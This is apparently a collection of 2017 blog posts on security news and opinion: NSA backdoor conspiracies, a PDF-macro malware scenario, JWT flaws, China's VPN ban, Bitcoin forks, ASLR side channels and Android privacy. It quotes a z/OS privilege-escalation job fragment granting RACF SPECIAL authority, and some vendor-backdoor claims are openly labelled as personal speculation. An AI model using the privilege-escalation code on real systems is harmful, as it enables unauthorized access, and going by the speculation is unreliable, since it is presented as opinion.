Scientific versus Prejudice – Cyber war Part II

Preface

The scandal of NSA let the world know large scale survillence program over the world. Perhaps the objective of the NSA not only this matter. We known that a vulnerability happened on VSAT satellite system. It allow malicious SMS signal obfuscate the system operation. For more details, please refer to below URL.
The war happens today hard to avoid to involve cyber technology battle. This is the prelude of the discussion today. What if, my imagination comes true, what will happen in this battle?

NSA’s backdoor catalog (OS system and Network) exposed:

On exposed information, a group list of vendors name are included in their target list. As we know, we believed that Microsoft, Cisco products hidden their backdoor. However CEO of Cisco tell the world that their products did not have embedded backdoor. Microsoft president Brad Smith blamed the NSA spy agency tarnished their system design. Do you think those two big head is a actor or they are really don’t  know?
Conspiracy theory point of view on OS system ( merely personal opinion )

In conspiracy theory point of view, what is the reason for operation system vendor maintain SMB version 1 until NSA scandal exposed to the world then take the patching action. Perhaps if not WannaCry ransomware attack outbreak tarnished SMB 1 design limitation. Meanwhile hacker claimed that they are appreciate for NSA found this secret! Since nobody aware this issue until secret leak to the world! But who know what is the true factor let OS vendor delay SMB version 1 patching schedule till incident happen afterwards? (Microsoft released patches for all supported versions of Windows on the March 2017).

Conspiracy theory point of view on Network system ( merely personal opinion )

Based on the Shadow Brokers disclosed. The two exploits, listed in the archive directory as EPICBANANA and EXTRABACON, can be used to achieve remote code execution on Cisco firewall products. A vulnerability exploited by one of the tools was patched in 2011 but the other exploit’s vulnerability is entirely new. From logical point of view, it is hard to imagine that such big technology company did not know the design weakness of their product? Maybe they are trustworthy. Or Who know, God know?

Who dare say there is no unknown backdoor in hardware unit including CPU

Information Update on 31st Aug 2017 – Intel Active Management Technology, Intel Small Business Technology, and Intel Standard Manageability Escalation of Privilege

Headline news today report that CPU vendor design computer according the requirement by customer , sometimes the client is a government. For instance, US government might compliance to their security standard (High Assurance Platform program so called HAP). However a design limitation was found. An official announcement by Intel in regards to this vulnerabilities on May 2017. Furthermore security experts found a unknown backdoor on Intel ME Chip. From technical point of view, this is not coincidence and speculated that both vulnerabilities has relationship.

https://www.intel.com/content/www/us/en/architecture-and-technology/intel-amt-vulnerability-announcement.html

From safety view point, it is impossible to use hostile national science and technology products

 

In defense and protective prospective, it was not possible to use hostile national science and technology products in military zone. Even though the hardware and operation system vendor are trustworthy. However the hostile country will try different to implant malware or infiltrate techniques to related system. For instance, Network equipment vendor (router, switch and firewall) do not know the design weakness will trigger such critical level of destructive result.  Below is a simple example to proof this concept.

Picture A is the reference of normal network operating scenario. We understand that internet world coexists with BGP network protocols.  The zoning driven by AS number (autonomous system number). The AS Using BGP to Distribute Routes. For instance, on picture B. The ISP D network equipment hits SNMP design flaw and encountered core OS buffer overflow causes privileges escalation. As a result the core router has been compromised. Base on BGP protocol hijack concept, the compromised router might obfuscate the network. It might have way to control the network routing path. I am not going to explain into details since it is a very long discussion. However if you base on above techincal terms and concept do a google search. You will be able to find the details. Yes, internet world is the big data. It  is free. 

Put above concept to the realistic world

Since above example is my imagination, however it will bring a solid idea to you. How serious level of destruction will be occurs in similar circumstances. So to protect yourself in cyber war battle seems better do not let your enemy know what type of equipment you are in use. Even though they are using CVE attack or Zero day attack. You equipment will be ignore those kind of cyber attack.

The focus of the discussion

I can’t written down a term of summary or conclusion right now. Since there are more and more information coming. However I need to study the details before continues this discussion. Ok, have a nice weekend. We discuss next time, Thank you! Bye!

Picture A – Normal scenario (request to reach adjacent side IP address)

Picture B – Telecommunication service provider network equipment compromised by hostile national.(As a result, the network traffic will route to their area and under their control)

 

Electronic War reference:

http://www.antihackingonline.com/cell-phone-iphone-android-windows-mobile/the-other-side-of-the-story-on-cyber-attack-electronic-war-between-countries/

 

 

 

 

 

 

 

Perhaps military battleship can destroy everything, but it could not win in the digital war!

We heard battleships accident occurs this year. The most recent accident was that it collides with oil tanker near Singapore! (see below BBC news)

http://www.bbc.com/news/world-asia-40995829

I am interested of cyber security technology and believed that Navy already has advanced cyber defense mechanism. The errors which occurred was taken by careless mistake! Headline news was told that a possibility might causes by cyber attack. It is hard to believed in earlier stage that this is a possible factor. But now change my mind, since (VSAT) Satellite Communication Systems rife with security flaws. It was vulnerable to Remote Hacks path! This technical limitation not the news today. It was found on 2014. The subject matter expert found that just sending a simple SMS or specially crafted message from one ship to another ship would be successful for some of the SATCOM systems.

Remark: Rumors told that a weakness happen on VSAT Firmware.

A design weakness was found on the system based on Information security design best practice (see below information for reference)

Identification – identify trusted source (malicious SMS or crafted message)

Authentication – permit or denied request (an authentication mechanism system authorize the electronic computing process)

Silence (behalf of penalty) of the lambs

We all known the discipline of Military is serious. Any change management requires inform the duty officer (captain). For instance, management team define the fairway. It requires authorize person acknowledgment before modifications. If the specify accident not a low level mistake (absence duty or incorrect operation procedure). It looks that the hardware manufacturer might bare the responsibilities. However do the firmware upgrade not a difficult way in IT world because Microsoft do the software patching weekly!

My comments

Since the overall political atmosphere looks unstable in APAC countries. The United States Seventh Fleet responsible to equality of power and peaceful of this area (after finished the battle of World War II). However a technical limitation (hiccup) shown to the world in military force. Even though you have anti-defense to offence missile send by South Korea. But any military plan it is a dangerous game indeed.

 

Perhaps Enigma contains iron wall, but it couldn’t defense the a simple word processing technology

 

Preface

Enigma crypto currency Platform told the world they are next generation of cypto currency Exchange. Banking and financial industry believes that this is a trustworthy platform. Not Kidding, enterprise invests to build and support. Apart from that MIT expertise develop and design a prefect cryptographic mechanism. A shock to the world this week said that they are fall into the victim group of cyber attack.

https://www.wired.com/story/enigma-ico-ethereum-heist/

Headline news claimed that it cause by “DUMB MISTAKE” – Slack account with administrative privileges, had previously leaked

What if! We assume that their Enigma design architecture is not vulnerable. And there is another reason let this incident occurs. Is it a insider threat caused by end user computing?

This incident under law enforcement investigation. since we do not know the root cause. But we can setup a virtual reality scenario see whether we can find out the possibility.

PDF format of file, a benefits bring to malware

  1. Hidden inside a Word document that’s hidden inside a PDF

Scenario:

Step 1: Emailed spam with a PDF attachment
Step 2: PDF has an attached document inside, which is trying to get opened by the Acrobat Reader
Step 3: Once the document is opened in MS Word, it asks you to enable editing (social engineering attack)
Step 4: Runs a VBA macro, which downloads and runs the malicious code
Step 5: Insider threat happens. Try to collect the sensitive data includes credential

2. Open source applications lure malware infection

Sounds not possible! Enterprise firm less implement software application open source concept. As a matter of fact, similar idea happened in enterprise firms including broker firm and investment banking. It is hard to image that such profit making industries concerns about software licenses. But it is a factual case.

Scenario:

A critical zero-day security vulnerabilities in Foxit Reader software that could allow attackers to execute arbitrary code on a targeted computer.

CVE-2017-10951 –  vulnerabilities can be triggered through the JavaScript API in Foxit Reader.

CVE-2017-10952: This vulnerability exists within the “saveAs” JavaScript function that allows attackers to write an arbitrary file on a targeted system at any specific location

Remark: Foxit refused to patch both the vulnerabilities because they would not work with the “safe reading mode”

3. Vulnerability in LinkedIn Messenger 

Scenario:

Even though enterprise firm will be included Linkedin into the white list. It allow their staff access without restriction. Regarding to subject matter expert vendor (Checkpoint), Linkedin message Would Have Allowed Malicious File Transfer. LinkedIn allow the following file extensions to be uploaded and attached within a message:

Documents – csv, xls, xlsx, doc, docx, ppt, pptx, pdf, txt.
Images– gif, jpeg, jpg, png.

As a result, the specific issue triggers inherent risk fall into above item 1 information security design weakness.

Current status

Let stop discussion here, there are more possibilities or ways once the attack vector happens on insider threat (end user computing). We keep our eye open see whether any new findings later on.

Common vulnerability on application – who’s the perpetrator – Part 1

Preface

We heard cyber security incident daily, seems like a habit forming or it will be happened daily. We wasn’t gutted ( Feeling sad and unhappy) since we have already become insensitive!

Who’s the perpetrator?

The design limitation not only found on hardware (BIOS), OS (system kernel , dynamic link library and software driver). Besides, the critical risk sometimes found on application program design.  Since mobile phone become the technology world main stream in the market because of BYOD enable concept.May be you observe this factor earlier. Both personal computer and BYOD device looks has common criteria (not the security standard common criteria). The fact is that they are heavy duty to deploy of Java application. From technical point of view, the difference in between personal computer and BYOD device application platform might have minor things. For instance application cannot display on small size display screen. Web browser compatibility issue. Perhaps those problem enough to annoys application developers. However in regards of application infrastructure both personal computer and BYOD devices are sharing the similar application source. And such a way carry out a visible securiy bottle neck on application design. Yes, we select one of the bottle neck on software application development to discuss today. It is the API key, so I dubbed API key is the perpetrator.

What is API key?

With reference to Wikipedia (see below details for reference)

An application programming interface key (API key) is a code passed in by computer programs calling an application programming interface (API) to identify the calling program, its developer, or its user to the Web site.

API keys can be based on the universally unique identifier (UUID) system to ensure they will be unique to each user. The API key often acts as both a unique identifier and a secret token for authentication, and will generally have a set of access rights on the API associated with it.

Appendix i :

API key = public unique identifier for your app.

Access token = another secret! But a new one is generated every time a new person installs your app. Each one is used for authentication of regular API calls to a particular shop.

API Key fundamental design weakness 

Kill chain – scenario A (Application program design weakness)

  • User gets infected with malicious program
  • Malicious program opens up /rest/config
  • Malicious program navigates to / and takes the CSRF token from the cookie it receives
  • Malicious program now has complete control over the REST POST interface

Kill chain – scenario B (system application software package (library) design weakness)

JSON Web Token (jwt) vulnerability includes the following authentication mechanism : node-jsonwebtoken, pyjwt, namshi/jose, php-jwt or jsjwt with asymmetric keys (RS256, RS384, RS512, ES256, ES384, ES512)

The original design of JSON Web Token structure contains 3 parts , a header, a payload, and a signature.  See below details for reference.

Prerequisite – require X509 Private/Public Key Pair to generate the digital signature.

The Base64-URL encoded representation of the Secure Header
The Base64-URL encoded representation of the Payload
The signature that is generated from the combined "payload.header"
Assembling all of these together as payload.header.signature

Below simple node.js code that uses the jsjws node module to create the JWS

var assert = require('assert');
var jsjws = require('jsjws');
var fs = require('fs');

var privKeyFile = fs.readFileSync('./dsig-key.pem');
console.log("privKeyFile: " + privKeyFile);
var priv_pem = jsjws.createPrivateKey(privKeyFile, 'changeit','utf8');
var pubCertFile = fs.readFileSync('./dsig-cert.pem');
console.log("pubKeyFile: " + pubCertFile);
var pub_pem = jsjws.X509.getPublicKeyFromCertPEM(pubCertFile.toString())

var header = { alg: 'RS256' };
console.log("Header: " + JSON.stringify(header));
var payload = { 'a':'b',
'c':'d',
'e': 1.0
};
console.log("Payload: " + JSON.stringify(payload));

var sig = new jsjws.JWS().generateJWSByKey(header, payload, priv_pem);
console.log("Signature: " + sig);
var jws = new jsjws.JWS();

assert(jws.verifyJWSByKey(sig, pub_pem, ['RS256']));
assert.deepEqual(jws.getParsedHeader(), header);
assert.equal(jws.getUnparsedPayload(), JSON.stringify(payload));

console.log("UnparsedHeader: " + jws.getUnparsedHeader());
console.log("UnparsedPayload: " + jws.getUnparsedPayload());

Found Critical vulnerabilities in JSON Web Token libraries (March 31, 2015)

A design limitation on library occurred, some libraries treated tokens signed with the none algorithm as a valid token with a verified signature. This is so called “none” algorithm.

Therefore hacker can create their own “signed” tokens with whatever payload they want, allowing arbitrary account access on some systems.

Remediation & Mitigation

It looks that the vulnerability found on library has security remediation today. As we know the vulnerabilities in JSON Web Token libraries can settle by latest version of software libraries. But how about the application program design weakness item?  As far as I know. Even though you are going to manage your API Keys with Java, Jersey, and Stormpath. The common standard on API Key management in the market more relies on the following solution.

  1. Filter  (regular expression). As far as I know,  It requires the preventive control filtering function to avoid
  2. Define full scope of authentication mechanism (something you have,something you know and something you are)
  • Define authentication protocol
  • Based on the authentication result object do the integrity check
  • Check the token that received, and appropriately gives appropriate action (forbid or access).

Opinion

In regards of API key, authentication Token & XML language are hard to avoid the risks once they are working together. However it is hard to avoid in such operation manner in business world. But I would like to let this opportunities to urge software developer that JSON Web Tokens should be avoided in your application design.  If your design insists to adopt such methodology. You must re-confirm the data classification level in your local repository and business criteria. If both two domain subjects not in DCL 3,4 and not the critical business operation. May be it still a green light signal. If not it is better to find other alternative.

China ban VPN connectivity – current status Aug 2017

 

Preface:

The objective of China government ban VPN connectivity goal to control over its national internet, free from undue foreign influence.

Schedules (Milestone)

Action 1 – China Government Seeks Public Comments on the Cryptography Law (May 2017)

Action 2 – Telecommunication services providers includes China Mobile, China Unicom and China Telecom, to bar people from using personal VPN with effective Feb 2018. This is a mandatory action.

Action 3 – An official announcement of New cybersecurity regulation especially on Virtual Private Network connectivity (see below for reference) with effective on 1 June 2017.

Act:  The state shall take measures to monitor, defend against and deal with cybersecurity risks and threats from both inside and outside the territory of the People’s Republic of China, protect critical information infrastructure from attack, intrusion, interference and damage, punish illegal criminal activities on the network in accordance with the law, and maintain cyberspace security and order.

Action 4 – Green VPN, a China-based VPN service mainly employed by native Chinese users to bypass the Great Firewall, has been shut down on Jul 2017.

Action 5 – Apple has removed VPN apps from China’s App Store

Action 6 – China moves to block internet VPNs from 2018

Current VPN activities in China

The latest crackdown is focused on individuals, which means companies and other organizations will still have the ability to access VPNs or VPN-like services as long as they are registered.

Great wall (China Firewall) responsibility

Denied internet connectivity to Facebook, Twitter, YouTube, and Instagram. The new blocked sources include the New York Times and the Wall Street Journal, along with sites such as Google Scholar.

Next Step

1. All internet users in China go online using services run by the state-owned carriers.

2. Forcing companies to store information within the mainland.

3. The government has ordered China’s three telecommunications companies to completely block access to virtual private networks, or VPNs, by February 2018. For those who requires VPN function, it require to apply the registration license.

Highlight – Major objective of new cyber security regulation

Forcing companies to store information within the mainland.

The electronic certification service vendor (approved by China government) list displayed below:

电子认证服务使用密码许可单位名录
  
(许可证有效期5年)

序号
单位名称
所在地区
许可证号
发证日期
1
山东省数字证书认证管理有限公司
山东
0001
2015/5/1
2
上海市数字证书认证中心有限公司
上海
0002
2015/7/1
3
陕西省数字证书认证中心股份有限公司
陕西
0003
2015/6/1
4
浙江省数字安全证书管理有限公司
浙江
0004
2015/8/20
5
江西省数字证书有限公司
江西
0005
2015/9/25
6
河南省数字证书有限责任公司
河南
0006
2015/5/1
7
吉林省安信电子认证服务有限公司
吉林
0007
2016/4/19
8
中金金融认证中心有限公司
北京
0008
2015/3/1
9
西部安全认证中心有限责任公司
宁夏
0009
2015/9/25
10
北京天威诚信电子商务服务有限公司
北京
0010
2015/3/1
11
福建省数字安全证书管理有限公司
福建
0011
2015/11/16
12
东方中讯数字证书认证有限公司
重庆
0012
2015/3/1
13
广东省电子商务认证有限公司
广东
0013
2015/3/1
14
数安时代科技股份有限公司
广东
0014
2016/6/11
15
湖北省数字证书认证管理中心有限公司
湖北
0015
2015/7/1
16
辽宁数字证书认证管理有限公司
辽宁
0016
2015/3/1
17
北京数字认证股份有限公司
北京
0017
2016/12/9
18
江苏省电子商务服务中心有限责任公司
江苏
0018
2012/5/24
19
颐信科技有限公司
北京
0019
2015/3/1
20
新疆数字证书认证中心(有限公司)
新疆
0020
2015/4/1
21
河北省电子认证有限公司
河北
0021
2012/3/16
22
山西省数字证书认证中心(有限公司)
山西
0023
2015/4/1
23
北京国富安电子商务安全认证有限公司
北京
0024
2015/3/1
24
安徽省电子认证管理中心有限责任公司
安徽
0025
2015/3/1
25
深圳市电子商务安全证书管理有限公司
广东
0026
2015/5/1
26
中网威信电子安全服务有限公司
北京
0028
2015/11/15
27
北京中认环宇信息安全技术有限公司
北京
0029
2016/8/1
28
湖南省数字认证服务中心有限公司
湖南
0030
2015/3/1
29
中铁信弘远(北京)软件科技有限责任公司
北京
0031
2015/3/1
30
卓望数码技术(深圳)有限公司
广东
0032
2015/7/10
31
河南省信息化发展有限公司
河南
0033
2016/5/4
32
东方新诚信数字认证中心有限公司
湖南
0034
2012/2/23
33
广西壮族自治区数字证书认证中心有限公司
广西
0035
2013/3/7
34
沃通电子认证服务有限公司
广东
0036
2015/4/1
35
北京世纪速码信息科技有限公司
北京
0037
2014/12/2
36
云南省数字证书认证中心有限公司
云南
0038
2013/2/20
37
贵州省电子证书有限公司
贵州
0039
2013/2/20
38
山东云海安全认证服务有限公司
山东
0040
2015/6/12
39
内蒙古网信电子认证有限责任公司
内蒙古
0041
2015/9/6
40
苏博云科数字认证有限公司
湖南
0042
2016/10/12
41
黑龙江省数字证书认证有限公司
黑龙江
0043
2016/4/13
42
四川省数字证书认证管理中心有限公司
四川
0044
2016/5/1
43
天津市滨海数字认证有限公司
天津
0045
2016/5/16
44
泰尔认证中心
北京
0046
2016/7/19
45
重庆程远未来电子商务服务有限公司
重庆
0047
2016/10/26
(截止2016年12月15日

 

 

Bitcoin – Break the traditional rule of the world!

 

Preface

It looks a silent revolution, bitcoin technology spreading to the world. Even though government unsupported this financial tool and proprietary financial firm not accept this technology.
But he is valid in the finance and investment market. As a matter of fact, the activities running strong today (7th Aug 2017).

Our earlier study on block chain technology motion

Comparison table:

Hyperledge Ethereum Bitcoin
Association Linux Foundation Ethereum Developers Bitcoin Developers
Currency N/A Ether BTC
Mining Reward N/A Yes Yes
Network Design goal – Private Design goal – Public Public only
Privacy Private Open Open
Smart Contracts Multiple-programming language C++,Rust and Go i. Bitcoin Core, is written primarily in C++
ii. Lightweight clients like MultiBit and Bitcoin Wallet written in Java

 

Rouge-et-noir , they are all going to achieve this objective (blockchain or Hyperledger)

The maturity business model of bitcoin today

The fundamental design concept of bitcoin improvement program are based on vote or user input. And therefore Bitcoin is not controlled by any single entity or company. Whereby an improvement program framework has been introduced. It is so called BIP (Bitcoin Improvement Proposal).

Remark 1: A Bitcoin Improvement Proposal (BIP) is a design document for introducing features or information to Bitcoin. The BIP should provide a concise technical specification of the feature and a rationale for the feature. This is the standard way of communicating ideas since Bitcoin has no formal structure. The first BIP (BIP 0001) was submitted by Amir Taaki on 2011-08-19 and described what a BIP is?

Proposal 91

Upcoming Bitcoin activation of Bitcoin Improvement Proposal 91 (BIP 91). Bitcoin Improvement Proposal 91 (BIP 91, also known as Miner Activated Soft Fork) recently locked in over 90 percent of all mining hash power, signaling majority support for this proposal. BIP 91’s lock in effectively makes BIP 148 (User Activated Soft Fork scheduled for August 1) obsolete and discard the chances of the Bitcoin network forking through UASF (User Activated Soft Fork). What is the reason to nullifies UASF?

Bitcoin Possible Crisis, User Activated Soft Fork(UASF BIP-148)-Vulnerability encountered CVE-2017-9230

For more details about the vulnerability, please refer below url for reference

https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2017-9230

Bitcoins tell the world,  sunrise is on the way.

The Bitcoin Improvement Proposal (BIP) expect to meet the goal on 1st August 2017. The goal is launch of a new coin and Bitcoin Cash (BCC). These coin should include strong replay protection. All you need to do to be able to access your BCC is control your bitcoin (BTC) private keys on this day.

BIP 91 objective – BIP 91 requires 80% of the coin miners to support. Besides, it require to locking  SegWit2x’s (SegWit) update on 1st August 2017.

Remark 2: SegWit was proposed by Bitcoin Core volunteers to increase network capacity and solve transaction scalability through soft folk on 2015.

Remark 3: SegWit2x (BTC1): Supported by miners and start-up companies, the proposal aims to develop SegWit through a soft fork.

Breakthrough – below voting status shown that BIT 91 receive miner fully support

Summary:

As of today, bitcoin looks running strong in the market. We keep our eye open see whether any unforeseen matter happen in coming month.
……..in deo speramus

 

 

 

 

The enemy of ASLR (Address space layout randomization) – memory leak

Preface

Address space layout randomization (ASLR) is a computer security technique which popular in cyber world today. Since it reduce the ratio of incident hit rate of malware infection. Do you agree that there is not required to worries about malware infection once ASLR implemented?

Start discussion

We discuss ASLR topics in our earlier discussion (see below).  Our discussion last time focus on virtual machine (VM) especially VMware.

Mirror Copy – He is great partner of virtual machine but he can kill VM simultaneously – address space layout randomization

We move our focus on mobile phone this time especially Android system. As far as we know, chip-set vendors (Qualcomm and Intel) going to reduce the attack surface with division of duty of design.

Highlight of division of duty of design on mobile chip set

Baseband processor: Manages all the radio functions except Wi-Fi and Bluetooth radios. A baseband processor typically uses its own RAM and firmware.

WiFi chip-sets:  responsible for handling the PHY, MAC and MLME on its own, and hands the kernel driver data packets that are ready to be sent up.

Reference point:  We noticed that research found that hacker can implant malicious code relies on WiFi chip-set design weakness to compromised Baseband processor. Since WiFi chip-set did not protect by ASLR technique. But this time we are not going to focus on chipset design weakness from mobile phone topic. As such we move on to the following items of discussion.

ASLR implementation status on Android

Early Android versions only had stack randomization due to lack of kernel support for ASLR on ARM. The address space layout randomization (ASLR) has been adopted in their design since 2015. Android version  4.1 introduced support for full ASLR by enabling heap randomization and  position Independent Executables (PIE). But we frequently heard that Android OS encountered malware infection. But what is the root causes?

  1. Non traditional spawning model

On Android system (from my personal view point it is a tailor made Linux), but the memory management design have different. A process so called Zygote.
However the zygote process have design limitation. It might have possibilities let malware to do the infiltration (see below detail for reference).

 

Mobile apps like your wife or girlfriend. They are tracing you!

2. Memory leak

Android system needs to manage memory allocation resources. A programmatically initiate that Garbage initiation when memory runs short. Garbage collection base on the following criteria.

a. Verify all object references in memory , non reachable object will go to Garbage collection. Everything else are wiped out from memory to free up resources

b. Everything serving the user should be kept in memory

Garbage collection design weakness Highlight

a. The drawback is that when code are written in negligence form result that unused objects are referenced somehow from reachable objects, garbage collection would mark unused objects as useful object. As a result it would not be able to remove. This is called a memory leak. From technical point of view, memory leak will be few kilo bytes to mega bytes. However mobile phone application relies on  java engine and Java script. Java dynamic language use garbage collect to management memory. To enhance CPU performance, a caching technology will be in use. A design weakness was found is that component shares some of its cache with untrusted applications. Hacker could send malicious JavaScript that specifically targeted this shared memory space.  A known bug (see below CVE details) confirm that JavaScript Attack Breaks ASLR on CPU Micro-Architectures  (vulnerable CPU displayed as below:)

CVE – vulnerabilities on CPU

CVE-2017-5925 is assigned to track the developments for Intel processors
CVE-2017-5926 is assigned to track the developments for AMD processors
CVE-2017-5927 is assigned to track the developments for ARM processors
CVE-2017-5928 is assigned to track the JavaScript timer issues in different browsers

Vulnerable CPU (mobile phone devices)

Allwinner A64 ARM – Cortex A53 (2016)
Intel Xeon E3-1240 v5 – Skylake (2015)
Intel Core i7-6700K – Skylake (2015)
Intel Celeron N2840 – Silvermont (2014)
Samsung Exynos 5800 – ARM Cortex A15 (2014)
Samsung Exynos 5800 – ARM Cortex A7 (2014)
Nvidia Tegra K1 CD580M-A1 – ARM Cortex A15 (2014)
Nvidia Tegra K1 CD570M-A1 – ARM Cortex A15; LPAE (2014)

b. The side-channel attack capable to bypass ASLR algorithm and assists malware implant to the system. The modern CPU require work with internal or external cache. Therefore this is the other alternative way may potentially bypass ASLR memory protection.

i. Evict + time

The attacker measures the time it takes to execute a piece of victim code. Then attacker flushes part of the cache, executes and times the victim code again. The difference in timing tells something about whether the victim uses that part of the cache.

ii. Prime + probe

The attacker now accesses memory to fill part of the cache with his own memory and waits for the victim code to execute. (Prime) Then the attacker measures the time it takes to access the memory that he would carefully placed in cache before. If it’s slow it is because the victim needed the cache and this gives us knowledge about what victim did. (Probe)

iii. Flush + reload

The flush and reload attack utilizes that processes often share memory. By flushing a shared address, then wait for the victim and finally measuring the time it takes to access the address an attacker can tell if the victim placed the address in question in the cache by accessing it.

Summary:

It looks that new technologies claimed that it avoid malware infection. For instance 64-bit OS and ASLR. As a matter of fact, these technology are valid and required. However we can’t say we are now secure! Refer to above discussion. Any mis-use operation or negligence form of programming technique, hacker might find vulnerability to compromise your mobile system even though ASLR is running on your mobile.

Tips to detect Android memory leak

LeakCanary is an Open Source Java library to detect memory leaks in your debug builds.

You create a RefWatcher instance and give it an object to watch:

// We expect java-id-session to be gone soon (or not), let's watch it.
refWatcher.watch(java-id-session);

When the leak is detected, you automatically get a nice leak trace:

* GC ROOT static ..............
* references .............
* leaks ....... instance

Have  a nice weekend!

 

 

 

 

 

 

Do you think Mainframe forever secure in cyber world?

Preface:

IBM z/OS assumed to be secure because it have ACF2 & RACF.

Mainframe access control types:

RACF – Resource Access Control Facility or RACF® provides the tools to help the installation manage access to critical resources.

ACF2 – (Access Control Facility) is a commercial, discretionary access control software security system developed for the MVS (z/OS today), VSE (z/VSE today) and VM (z/VM today)

Start discussion

Why we have this discussion topic today? We all known IBM z/OS is a proprietary OS. The Enterprise firms especially Banking and Finance group They are relies on mainframe comupter to do the handle the high volume of electronic transaction procoess.

A term so called operation day end process, it is well known job process in banking finance, broker firm and insurance industries.

Since Mainframe responsible for the back end job and therefore the modern Java apps with front end web application not direct communicate with this giant (see below diagram for reference). The inquiry and data download will be responsible by middle tier. Such architecture implementation not require high risk components especially Java components did not install on top of mainframe partition (LPAR).

As times goes by, Unified Computing System techniques like from virtual storage integrate to cloud computing and run in wide range of coverage. Actually mainframe is the pioneer of Unified Computing System technology. Since 2000 IBM z/OS (MVS) capable to support more than one OS running on top on the machine. It can be partitioned into multiple logical partitions, each hosting a separate operating system. A logical partition, commonly called an LPAR, is a subset of a computer’s hardware resources, virtualized as a separate computer.

Vulnerability not the proprietary of Microsoft OS and Linux OS

The penetration test performed by Mark Wilson on 2013. There are over 100 vulnerabilities found on z/OS even 1.13. The weakness of z/OS happened in the following area:

  • Poor APF Library protection
  • Poor SURROGAT profiles
  • Poorly coded SVC’s

Reference: z/OS V1R1 was first introduced in October 2000, z/OS Initial release on March 30, 2001 , Version 2.2 (V2R2) introduced on June 28, 2015. On February 21, 2017 IBM z/OS Version 2 Release 3 go to the market and available to use.

Hold different opinion on vulnerability

My assumption base on the security findings of a security auditor (Ayoub Elaassal) from Black Hat conference in Las Vegas.  His finding is that the ASM program updates the ACEE block in memory to give temporary SPECIAL privilege and causes privileges escalation. Hints that if you want to manually specify the user getting the SPECIAL privilege, replace userid() with any user in line 104 (see below command syntax for reference)

QUEUE "/*"
 QUEUE "//STEP01 EXEC PGM="||PROG||",COND=(0,NE)"
 QUEUE "//STEPLIB DD DSN="||APF_DSN||",DISP=SHR"
 QUEUE "//STEP02 EXEC PGM=IKJEFT01,COND=(0,NE)"
 QUEUE "//SYSTSIN DD *"
 QUEUE " ALU "||userid()||" SPECIAL OPERATIONS"
 QUEUE "/*"
 QUEUE "//SYSIN DD DUMMY"
 QUEUE "//SYSTSPRT DD SYSOUT=*"
 QUEUE "//*"

Ayoub Elaassal create a utility to test the privileges escalation on z/OS.  The file name of the utility is ELV.APF.

***The authorized program facility (APF) helps your installation protect the system. APF-authorized programs can access system functions that can affect the security and integrity of the system. APF-authorized programs must reside in APF-authorized libraries, which are defined in an APF list, or in the link pack area.

However any misconfiguration will make a castle become a unsecured house…..But our study bring me consider of the malware infection on non IBM CISC environment especially Windows server environment and Linux environment!

If above speculation is true. The z/OS system will be encountered of the following security problem.

It looks that IBM need to cope with IT world trend. CISC system environment capable of Java framework. CICS uses the IBM 64-bit SDK for z/OS, Java Technology Edition.  Regarding to our earlier discussion, 64 bit OS environment not absolute avoid malware infection. Even though you apply ASLR technology, sometimes a open source or 3rd party application will bring up operation problem causes system developer to modify the core system source code and not aware to create the vulnerability.  We all known business driven the IT world instead of technology or Information security.

Visitor who will be interested of the report of mainframe penetration tool, please visit GitHub to find out the details.

https://github.com/ayoul3/Privesc

….let me find out more information security items and share with you soon! Bye!

 

 

 

Price of your privacy – mobile phone

Preface:

Google Pinyin,QQ,TouchPal,Sogou IME apps has high volume download volume in Google Play store. However user may also be vulnerable to component-hijacking attacks. Do you think whether there are more apps monitor your mobile phone silently!

Start discussion:

We heard technical terms so called predictive search and auto-correction. Google browser (Chrome) keyboard input feature apply similar technologies.

What is predictive search?

Google’s search feature uses a predictive search algorithm based on popular searches to predict a user’s search query. It requires interconnect with Google system.

What is auto-correction?

Auto correction is a feature in which an application predicts the rest of a word a user is typing. It requires interconnect with Google system.

Reality – existing situation in the market 2017

It looks that above criteria make sense, user are allow to disable this function. If mobile owner forgot to enforce the access permission setting. Seems their personal information will be forward to google during web site visiting. Their goal is going to do the web behavior analytic. As far as I know, the applications like google app, Google Zhuyin input, Google  Pinyin input  are maintain the following spy able permissions.

Google App – Reads Browser Bookmarks, Knows location by Cell-ID and WiFi, Knows location by GPS signal, Runs on device startup, Reads all SMS messages and records audio on voice calls

Google Zhuyin Input – Records Audio on Voice Calls, Runs on device startup

Google Pinyin Input – Records Audio on Voice Calls, Runs on device startup

MiTalk (China users) – knows location by GPS signal, Received all SMS messages, Records Audio on Voice calls, Knows location by Cell-ID and WiFi, Handles Outgoing calls and Runs on device startup

Attention –  critical loophole

In 2015, a group of researcher in Chinese university of Hong Kong (Wenrui Diao, Xiangyu Liu, Zhe Zhou, Kehuan Zhang, Zhou Li) found a vulnerability on Pinyin input. A vulnerability so called cross-app KeyEvent injection (CAKI) attack will be encountered on Google Pinyin input method. The flaw is that it allow 3rd party to harvest entries from the personalized user dictionary of IME through an ostensibly innocuous app only asking for common permissions.

Android CAKI vulnerability

Speculation:

We keep track of android vulnerabilities so far. I note with concerns of CVE-2016-9651.  This vulnerability is allow to collect the Invisible Private Property on your android phone. Details is shown as below:

Get all properties of an special object by d8 shell command

d8> var specialObject = new Error("test");
d8> var ownNames = Object.getOwnPropertyNames(specialObject);
d8> var ownSymbols = Object.getOwnPropertySymbols(specialObject);
d8> var ownKeys = ownNames.concat(ownSymbols)
d8> ownKeys
["stack", "message"] ---------> all public properties got by normal JavaScript
d8> %DebugPrint(specialObject)
DebugPrint: 0x3058e8cd: [JS_ERROR_TYPE]
- map = 0x53d0945d [FastProperties]
- prototype = 0x2560b9e1
- elements = 0x45384125 <FixedArray[0]> [FAST_HOLEY_SMI_ELEMENTS]
- properties = { ---------> all properties got by DebugPrint
#stack: 0x453d012d <AccessorInfo> (accessor constant)
#message: 0x453bb18d <String[4]: test> (data field at offset 0)
0x453859f1 <Symbol: stack_trace_symbol>: 0x3058e9c1 <JS Array[6]> (data field at offset 1) ---------> private property
}

If above flaw co-exists with this vulnerability. Sounds like a prefect surveillance backdoor allow 3rd to collect the information of your android phone. As a matter of fact, the surveillance program or cyber espionage keep track of our mobile activities daily. If such action is collected by your government for crime prevention purpose or big data foundation framework. From certain point of view, we have no doubt to say no. However, who can say how much is the value your personal privacy on your mobile phone?

Reference:

Mobile phone applications – access permission component

Application must have an AndroidManifest.xml file in its root directory. The manifest file provides essential information about your app to the Android system, which the system must have before it can run any of the app’s code. Manifest file capable declares the permissions (see below) that the application must have in order to access protected parts of the API and interact with other applications. It also declared the permissions that others are required to have in order to interact with the application components.

Sample – Manifest file capable declares the permissions

<?xml version="1.0" encoding="utf-8"?>
